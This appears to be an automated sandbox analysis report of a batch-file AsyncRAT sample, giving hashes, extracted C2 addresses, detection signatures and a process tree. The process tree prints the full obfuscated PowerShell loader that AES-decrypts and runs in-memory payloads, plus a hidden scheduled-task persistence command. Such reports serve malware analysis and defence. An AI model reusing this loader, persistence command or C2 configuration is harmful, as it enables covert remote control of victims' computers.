Resubmissions

09-11-2024 16:16

241109-tq8bssxgql 10

09-11-2024 16:15

241109-tqdgesxfpa 10

Analysis

  • max time kernel
    79s
  • max time network
    78s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-11-2024 16:16

General

  • Target

    lol.bat

  • Size

    279KB

  • MD5

    b5c81dca8f6b148790d14c93ba1788d4

  • SHA1

    11fa7bdf65ac8b835b27c895f3d3e357f87a28f2

  • SHA256

    7772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb

  • SHA512

    14bb171192854a481b7d26ec69e3dc7ffbe55755c3191629697298553ce919d5b1bd4719531b271304a530e5a01478bad0167f6fb66ae8d869da1f34b8713b51

  • SSDEEP

    6144:5toA7r23ZOt+yxLqRvs+wAbTXJuE/SzXm3+gK+4QpTz:4AsOkmqTPbTJuEcmut+ppTz

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:32758

pressure-continuous.gl.at.ply.gg:32758

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lol.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\lol.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\lol.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_70_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_70.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4428
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_70.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2632
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_70.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3392
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_70.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_70.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:448

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f8d49a4af7a844bfc7247d5670def557

    SHA1

    26ae0ce194a77a7a1887cf93741293fdfa6c94c4

    SHA256

    61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

    SHA512

    9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ex13idgy.bzi.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_70.bat

    Filesize

    279KB

    MD5

    b5c81dca8f6b148790d14c93ba1788d4

    SHA1

    11fa7bdf65ac8b835b27c895f3d3e357f87a28f2

    SHA256

    7772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb

    SHA512

    14bb171192854a481b7d26ec69e3dc7ffbe55755c3191629697298553ce919d5b1bd4719531b271304a530e5a01478bad0167f6fb66ae8d869da1f34b8713b51

  • C:\Users\Admin\AppData\Roaming\startup_str_70.vbs

    Filesize

    114B

    MD5

    8d53099ba3b77b55039d41ad3f29670f

    SHA1

    3d3896ed4a11e7906f14a9f89fdb4849d3c381ef

    SHA256

    c3700d6bcd0e76b0cb07748d54a5efae87d946a458eb16048407508bf0b4a702

    SHA512

    220f3cf7e1b11417b88f0fbe0b70f064c93c587f9be8c486ac3228bde3c35c456c9fef99feea55ce246f54c73cd512f9c5db527dc1fb32b5ff8ae8ee32412d4a

  • memory/448-46-0x000001F35AAA0000-0x000001F35AAB6000-memory.dmp

    Filesize

    88KB

  • memory/3700-11-0x000002657F580000-0x000002657F5A2000-memory.dmp

    Filesize

    136KB

  • memory/3700-13-0x0000026502510000-0x0000026502546000-memory.dmp

    Filesize

    216KB

  • memory/3700-12-0x00000265024D0000-0x00000265024D8000-memory.dmp

    Filesize

    32KB

  • memory/3700-1-0x00007FFD6CEC0000-0x00007FFD6CF8D000-memory.dmp

    Filesize

    820KB

  • memory/3700-0-0x00007FFD6CEC0000-0x00007FFD6CF8D000-memory.dmp

    Filesize

    820KB

  • memory/3700-47-0x00007FFD6CEC0000-0x00007FFD6CF8D000-memory.dmp

    Filesize

    820KB

  • memory/4428-27-0x00007FFD6CEC0000-0x00007FFD6CF8D000-memory.dmp

    Filesize

    820KB

  • memory/4428-15-0x00007FFD6CEC0000-0x00007FFD6CF8D000-memory.dmp

    Filesize

    820KB